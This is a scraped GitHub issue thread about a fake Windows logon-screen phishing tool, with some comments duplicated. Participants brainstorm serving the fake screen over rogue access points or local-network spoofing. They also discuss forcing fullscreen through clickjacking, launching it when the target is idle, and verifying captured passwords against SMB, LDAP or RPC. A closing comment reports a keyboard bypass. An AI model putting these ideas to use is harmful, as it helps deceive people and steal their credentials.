bitsadmin
commented
2 years ago Neat trick, I hadn't thought about that :) Would indeed be good to fix this, thanks for your report!
Open 0themhp opened 2 years ago
bitsadmin
commented
2 years ago Neat trick, I hadn't thought about that :) Would indeed be good to fix this, thanks for your report!
minanagehsalalma
commented
2 years ago @bitsadmin glad that you are still updating this super cool project
I wish someone would add the password verification part to wifiphisher
So it works remotely on local devices on the same network :(
bitsadmin
commented
2 years ago Interesting idea, to show a fake logonscreen in a browser when a client connects to a rogue access point. However, because the browser is probably not full screen, users will be less prone to fall for entering their password.
Also, password verification of the password entered in the browser window is challenging, as you will somehow need to find a server/port to validate the password. For example in case of a domain-joined machine the Domain Controller to test the password against SMB (445/TCP) or LDAP (389/TCP). In case it is not a domain-joined machine, you can try the password against the host itself, if ports like SMB or RPC (135/TCP) are reachable. As mentioned, it is challenging, but could be possible to automate, at least the 2nd case.
minanagehsalalma
commented
2 years ago Interesting idea, to show a fake logonscreen in a browser when a client connects to a rogue access point.
@bitsadmin Yeah thanks .... It can also be done in local network with some spoofing which is where it would be actually meaningful ... as for grabbing passwords from random devices doesn't make sense
However, because the browser is probably not full screen, users will be less prone to fall for entering their password.
Yeah you are right .... but it can be done using some quicky click jacking or something Images of the tricks used these days
I can't find the one i fall for ... but it went like this .... an ad showed up on a page on my phone .... i tried closing while clicking that X an allow nonfiction pop showed the exact second that i wasn't even able to notice that i clicked it ... it was really done right
Anyway i think you don't even need to display anything on the page .... just the phishing page will do ... user will typically click on it to see what it's about ...and the full screen will kick (as it requires any click by the user || addEventListener & Chrome Fullscreen API )
Moreover I think you could monitor a certain target device network traffic and then when inactivity detected .... You launch the scam so when the users come back and see it they will input the password without double thought as it would look like the typical Sleep screen lock
Also, password verification of the password entered in the browser window is challenging, as you will somehow need to find a server/port to validate the password. For example in case of a domain-joined machine the Domain Controller to test the password against SMB (445/TCP) or LDAP (389/TCP). In case it is not a domain-joined machine, you can try the password against the host itself, if ports like SMB or RPC (135/TCP) are reachable. As mentioned, it is challenging, but could be possible to automate, at least the 2nd case.
Hmmm ... I don't know if this would work for domain-joined machine or not ... but this what i suggested in the comments of the pull request mentioned
From EAPHammer
Regards
点击五次shift键,然后点击弹出窗口的链接,就可以跳转到系统设置,实现绕过 Click the shift key five times, and then click the link in the pop-up window to jump to the system setting to bypass